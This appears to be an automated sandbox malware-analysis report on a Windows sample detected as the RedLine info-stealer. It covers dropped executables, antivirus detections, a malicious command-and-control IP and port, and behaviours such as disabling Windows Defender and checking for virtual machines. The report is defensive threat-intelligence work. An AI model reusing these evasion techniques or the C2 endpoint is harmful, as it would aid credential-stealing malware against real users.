                          behaviorgraph top1 signatures2 2 Behavior Graph ID: 803670 Sample: file.exe Startdate: 10/02/2023 Architecture: WINDOWS Score: 100 45 Snort IDS alert for network traffic 2->45 47 Multi AV Scanner detection for domain / URL 2->47 49 Malicious sample detected (through community Yara rule) 2->49 51 10 other signatures 2->51 8 file.exe 1 4 2->8         started        11 rundll32.exe 2->11         started        13 rundll32.exe 2->13         started        15 rundll32.exe 2->15         started        process3 file4 39 C:\Users\user\AppData\Local\...\fuN31PL.exe, PE32 8->39 dropped 41 C:\Users\user\AppData\Local\...\dXL24Wx.exe, PE32 8->41 dropped 17 fuN31PL.exe 1 4 8->17         started        process5 file6 31 C:\Users\user\AppData\Local\...\fDI32WO.exe, PE32 17->31 dropped 33 C:\Users\user\AppData\Local\...\cfh9400.exe, PE32 17->33 dropped 53 Antivirus detection for dropped file 17->53 55 Multi AV Scanner detection for dropped file 17->55 57 Machine Learning detection for dropped file 17->57 21 fDI32WO.exe 1 4 17->21         started        signatures7 process8 file9 35 C:\Users\user\AppData\Local\...\bAS06bx.exe, PE32 21->35 dropped 37 C:\Users\user\AppData\Local\...\aRe53.exe, PE32 21->37 dropped 59 Antivirus detection for dropped file 21->59 61 Multi AV Scanner detection for dropped file 21->61 63 Machine Learning detection for dropped file 21->63 25 bAS06bx.exe 5 21->25         started        29 aRe53.exe 9 1 21->29         started        signatures10 process11 dnsIp12 43 193.233.20.11, 4131, 49696 REDCOM-ASRedcomKhabarovskRussiaRU Russian Federation 25->43 65 Antivirus detection for dropped file 25->65 67 Multi AV Scanner detection for dropped file 25->67 69 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 25->69 77 3 other signatures 25->77 71 Machine Learning detection for dropped file 29->71 73 Disable Windows Defender notifications (registry) 29->73 75 Disable Windows Defender real time protection (registry) 29->75 signatures13

                          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                          windows-stand
                          SourceDetectionScannerLabelLink
                          file.exe69%ReversingLabsWin32.Trojan.RedLine
                          file.exe59%VirustotalBrowse
                          file.exe100%AviraHEUR/AGEN.1252166
                          file.exe100%Joe Sandbox ML
                          SourceDetectionScannerLabelLink
                          C:\Users\user\AppData\Local\Temp\IXP001.TMP\fDI32WO.exe100%AviraHEUR/AGEN.1252166
                          C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exe100%AviraHEUR/AGEN.1252166
                          C:\Users\user\AppData\Local\Temp\IXP000.TMP\fuN31PL.exe100%AviraHEUR/AGEN.1252166
                          C:\Users\user\AppData\Local\Temp\IXP001.TMP\fDI32WO.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Temp\IXP000.TMP\fuN31PL.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Temp\IXP000.TMP\dXL24Wx.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Temp\IXP001.TMP\cfh9400.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Temp\IXP002.TMP\aRe53.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Temp\IXP000.TMP\dXL24Wx.exe79%ReversingLabsWin32.Spyware.RedLine
                          C:\Users\user\AppData\Local\Temp\IXP000.TMP\dXL24Wx.exe81%VirustotalBrowse
                          C:\Users\user\AppData\Local\Temp\IXP000.TMP\fuN31PL.exe69%ReversingLabsWin32.Trojan.RedLine
                          C:\Users\user\AppData\Local\Temp\IXP000.TMP\fuN31PL.exe55%VirustotalBrowse
                          C:\Users\user\AppData\Local\Temp\IXP001.TMP\cfh9400.exe33%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\IXP001.TMP\cfh9400.exe49%VirustotalBrowse
                          C:\Users\user\AppData\Local\Temp\IXP001.TMP\fDI32WO.exe64%ReversingLabsWin32.Trojan.RedLine
                          C:\Users\user\AppData\Local\Temp\IXP002.TMP\aRe53.exe85%ReversingLabsByteCode-MSIL.Trojan.Disabler
                          C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exe96%ReversingLabsByteCode-MSIL.Trojan.RedLine
                          SourceDetectionScannerLabelLinkDownload
                          0.0.file.exe.970000.0.unpack100%AviraHEUR/AGEN.1252166Download File
                          1.2.fuN31PL.exe.1a0000.0.unpack100%AviraHEUR/AGEN.1252166Download File
                          0.2.file.exe.970000.0.unpack100%AviraHEUR/AGEN.1252166Download File
                          2.2.fDI32WO.exe.a80000.0.unpack100%AviraHEUR/AGEN.1252166Download File
                          1.3.fuN31PL.exe.47c6820.0.unpack100%AviraHEUR/AGEN.1253311Download File
                          5.0.bAS06bx.exe.860000.0.unpack100%AviraHEUR/AGEN.1252166Download File
                          1.0.fuN31PL.exe.1a0000.0.unpack100%AviraHEUR/AGEN.1252166Download File
                          2.0.fDI32WO.exe.a80000.0.unpack100%AviraHEUR/AGEN.1252166Download File
                          No Antivirus matches
                          SourceDetectionScannerLabelLink
                          http://tempuri.org/Entity/Id12Response0%URL Reputationsafe
                          http://tempuri.org/0%URL Reputationsafe
                          http://tempuri.org/0%URL Reputationsafe
                          http://tempuri.org/Entity/Id2Response0%URL Reputationsafe
                          http://tempuri.org/Entity/Id21Response0%URL Reputationsafe
                          http://tempuri.org/Entity/Id90%URL Reputationsafe
                          http://tempuri.org/Entity/Id80%URL Reputationsafe
                          http://tempuri.org/Entity/Id50%URL Reputationsafe
                          http://tempuri.org/Entity/Id50%URL Reputationsafe
                          http://tempuri.org/Entity/Id40%URL Reputationsafe
                          http://tempuri.org/Entity/Id40%URL Reputationsafe
                          http://tempuri.org/Entity/Id70%URL Reputationsafe
                          http://tempuri.org/Entity/Id60%URL Reputationsafe
                          http://tempuri.org/Entity/Id19Response0%URL Reputationsafe
                          http://tempuri.org/Entity/Id15Response0%URL Reputationsafe
                          http://tempuri.org/Entity/Id6Response0%URL Reputationsafe
                          https://api.ip.sb/ip0%URL Reputationsafe
                          http://tempuri.org/Entity/Id9Response0%URL Reputationsafe
                          http://tempuri.org/Entity/Id200%URL Reputationsafe
                          http://tempuri.org/Entity/Id200%URL Reputationsafe
                          http://tempuri.org/Entity/Id210%URL Reputationsafe
                          http://tempuri.org/Entity/Id220%URL Reputationsafe
                          http://tempuri.org/Entity/Id1Response0%URL Reputationsafe
                          http://tempuri.org/Entity/Id1Response0%URL Reputationsafe
                          193.233.20.11:41317%VirustotalBrowse
                          http://tempuri.org/Entity/Id100%URL Reputationsafe
                          http://tempuri.org/Entity/Id110%URL Reputationsafe
                          http://tempuri.org/Entity/Id120%URL Reputationsafe
                          http://tempuri.org/Entity/Id16Response0%URL Reputationsafe
                          http://tempuri.org/Entity/Id130%URL Reputationsafe
                          http://tempuri.org/Entity/Id140%URL Reputationsafe
                          http://tempuri.org/Entity/Id150%URL Reputationsafe
                          http://tempuri.org/Entity/Id160%URL Reputationsafe
                          http://tempuri.org/Entity/Id170%URL Reputationsafe
                          http://tempuri.org/Entity/Id180%URL Reputationsafe
                          193.233.20.11:4131100%Avira URL Cloudmalware
                          http://tempuri.org/Entity/Id5Response0%URL Reputationsafe
                          http://tempuri.org/Entity/Id190%URL Reputationsafe
                          http://tempuri.org/Entity/Id190%URL Reputationsafe
                          http://tempuri.org/Entity/Id10Response0%URL Reputationsafe
                          http://tempuri.org/Entity/Id8Response0%URL Reputationsafe
                          http://tempuri.org/Entity/Id17Response0%URL Reputationsafe
                          http://tempuri.org/Entity/Id17Response0%URL Reputationsafe
                          No contacted domains info
                          NameMaliciousAntivirus DetectionReputation
                          193.233.20.11:4131true
                          • 7%, Virustotal, Browse
                          • Avira URL Cloud: malware
                          unknown
                          NameSourceMaliciousAntivirus DetectionReputation
                          http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#TextbAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            http://schemas.xmlsoap.org/ws/2005/02/sc/sctbAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              http://schemas.xmlsoap.org/ws/2004/08/addressing/faultPbAS06bx.exe, 00000005.00000002.396243360.0000000002B31000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                https://duckduckgo.com/chrome_newtabbAS06bx.exe, 00000005.00000002.396243360.0000000002E31000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.396243360.0000000002D19000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.399952618.0000000003D73000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.399952618.0000000003D13000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.399952618.0000000003CF6000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.399952618.0000000003DF1000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.399952618.0000000003C78000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.396243360.0000000002EBE000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.399952618.0000000003E0E000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.399952618.0000000003B64000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.396243360.0000000002C8D000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.396243360.0000000002DA5000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.399952618.0000000003E41000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.399952618.0000000003D90000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.399952618.0000000003BFA000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.399952618.0000000003C17000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.399952618.0000000003C95000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  http://schemas.xmlsoap.org/ws/2004/04/security/sc/dkbAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://duckduckgo.com/ac/?q=bAS06bx.exe, 00000005.00000002.399952618.0000000003C95000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinarybAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        http://tempuri.org/Entity/Id12ResponsebAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.396243360.0000000002B31000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.396243360.0000000002ECB000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://tempuri.org/bAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.396243360.0000000002B31000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        unknown
                                        http://tempuri.org/Entity/Id2ResponsebAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.396243360.0000000002B31000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1bAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          http://tempuri.org/Entity/Id21ResponsebAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.396243360.0000000002B31000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_WrapbAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://tempuri.org/Entity/Id9bAS06bx.exe, 00000005.00000002.396243360.0000000002B31000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLIDbAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://tempuri.org/Entity/Id8bAS06bx.exe, 00000005.00000002.396243360.0000000002B31000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              http://tempuri.org/Entity/Id5bAS06bx.exe, 00000005.00000002.396243360.0000000002B31000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              http://schemas.xmlsoap.org/ws/2004/10/wsat/PreparebAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://tempuri.org/Entity/Id4bAS06bx.exe, 00000005.00000002.396243360.0000000002B31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                unknown
                                                http://tempuri.org/Entity/Id7bAS06bx.exe, 00000005.00000002.396243360.0000000002B31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                http://tempuri.org/Entity/Id6bAS06bx.exe, 00000005.00000002.396243360.0000000002B31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecretbAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://tempuri.org/Entity/Id19ResponsebAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.396243360.0000000002B31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#licensebAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/IssuebAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      http://schemas.xmlsoap.org/ws/2004/10/wsat/AbortedbAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequencebAS06bx.exe, 00000005.00000002.396243360.0000000002B31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          http://schemas.xmlsoap.org/ws/2004/10/wsat/faultbAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            http://schemas.xmlsoap.org/ws/2004/10/wsatbAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeybAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                http://tempuri.org/Entity/Id15ResponsebAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.396243360.0000000002B31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                unknown
                                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namebAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/RenewbAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterbAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://tempuri.org/Entity/Id6ResponsebAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.396243360.0000000002B31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKeybAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://api.ip.sb/ipfDI32WO.exe, 00000002.00000003.308397385.00000000045DD000.00000004.00000020.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000000.333078964.0000000000862000.00000002.00000001.01000000.00000009.sdmp, bAS06bx.exe.2.drfalse
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        http://schemas.xmlsoap.org/ws/2004/04/scbAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PCbAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/CancelbAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://tempuri.org/Entity/Id9ResponsebAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.396243360.0000000002B31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=bAS06bx.exe, 00000005.00000002.399952618.0000000003C95000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://tempuri.org/Entity/Id20bAS06bx.exe, 00000005.00000002.396243360.0000000002B31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                unknown
                                                                                http://tempuri.org/Entity/Id21bAS06bx.exe, 00000005.00000002.396243360.0000000002B31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                unknown
                                                                                http://tempuri.org/Entity/Id22bAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.396243360.0000000002B31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                unknown
                                                                                http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1bAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1bAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/IssuebAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      http://tempuri.org/Entity/Id1ResponsebAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.396243360.0000000002B31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      • URL Reputation: safe
                                                                                      • URL Reputation: safe
                                                                                      unknown
                                                                                      https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=bAS06bx.exe, 00000005.00000002.396243360.0000000002E31000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.396243360.0000000002D19000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.399952618.0000000003D73000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.399952618.0000000003D13000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.399952618.0000000003CF6000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.399952618.0000000003DF1000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.399952618.0000000003C78000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.396243360.0000000002EBE000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.399952618.0000000003E0E000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.399952618.0000000003B64000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.396243360.0000000002C8D000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.396243360.0000000002DA5000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.399952618.0000000003E41000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.399952618.0000000003D90000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.399952618.0000000003BFA000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.399952618.0000000003C17000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.399952618.0000000003C95000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequestedbAS06bx.exe, 00000005.00000002.396243360.0000000002B31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnlybAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            http://schemas.xmlsoap.org/ws/2004/10/wsat/ReplaybAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnegobAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64BinarybAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PCbAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKeybAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      http://schemas.xmlsoap.org/ws/2004/08/addressingbAS06bx.exe, 00000005.00000002.396243360.0000000002B31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        http://schemas.xmlsoap.org/ws/2005/02/trust/RST/IssuebAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          http://schemas.xmlsoap.org/ws/2004/10/wsat/CompletionbAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            http://schemas.xmlsoap.org/ws/2004/04/trustbAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              http://tempuri.org/Entity/Id10bAS06bx.exe, 00000005.00000002.396243360.0000000002B31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              • URL Reputation: safe
                                                                                                              unknown
                                                                                                              http://tempuri.org/Entity/Id11bAS06bx.exe, 00000005.00000002.396243360.0000000002B31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              • URL Reputation: safe
                                                                                                              unknown
                                                                                                              http://tempuri.org/Entity/Id12bAS06bx.exe, 00000005.00000002.396243360.0000000002B31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              • URL Reputation: safe
                                                                                                              unknown
                                                                                                              http://tempuri.org/Entity/Id16ResponsebAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.396243360.0000000002B31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              • URL Reputation: safe
                                                                                                              unknown
                                                                                                              http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponsebAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/CancelbAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  http://tempuri.org/Entity/Id13bAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.396243360.0000000002B31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  • URL Reputation: safe
                                                                                                                  unknown
                                                                                                                  http://tempuri.org/Entity/Id14bAS06bx.exe, 00000005.00000002.396243360.0000000002B31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  • URL Reputation: safe
                                                                                                                  unknown
                                                                                                                  http://tempuri.org/Entity/Id15bAS06bx.exe, 00000005.00000002.396243360.0000000002B31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  • URL Reputation: safe
                                                                                                                  unknown
                                                                                                                  http://tempuri.org/Entity/Id16bAS06bx.exe, 00000005.00000002.396243360.0000000002B31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  • URL Reputation: safe
                                                                                                                  unknown
                                                                                                                  http://schemas.xmlsoap.org/ws/2005/02/trust/NoncebAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    http://tempuri.org/Entity/Id17bAS06bx.exe, 00000005.00000002.396243360.0000000002B31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    • URL Reputation: safe
                                                                                                                    unknown
                                                                                                                    http://tempuri.org/Entity/Id18bAS06bx.exe, 00000005.00000002.396243360.0000000002B31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    • URL Reputation: safe
                                                                                                                    unknown
                                                                                                                    http://tempuri.org/Entity/Id5ResponsebAS06bx.exe, 00000005.00000002.396243360.0000000002B31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    • URL Reputation: safe
                                                                                                                    unknown
                                                                                                                    http://tempuri.org/Entity/Id19bAS06bx.exe, 00000005.00000002.396243360.0000000002B31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    • URL Reputation: safe
                                                                                                                    • URL Reputation: safe
                                                                                                                    unknown
                                                                                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dnsbAS06bx.exe, 00000005.00000002.396243360.0000000002B31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      http://tempuri.org/Entity/Id10ResponsebAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.396243360.0000000002B31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      unknown
                                                                                                                      http://schemas.xmlsoap.org/ws/2005/02/trust/RenewbAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        http://tempuri.org/Entity/Id8ResponsebAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.396243360.0000000002B31000.00000004.00000800.00020000.00000000.sdmp, bAS06bx.exe, 00000005.00000002.396243360.0000000002ECB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        • URL Reputation: safe
                                                                                                                        unknown
                                                                                                                        http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKeybAS06bx.exe, 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          high
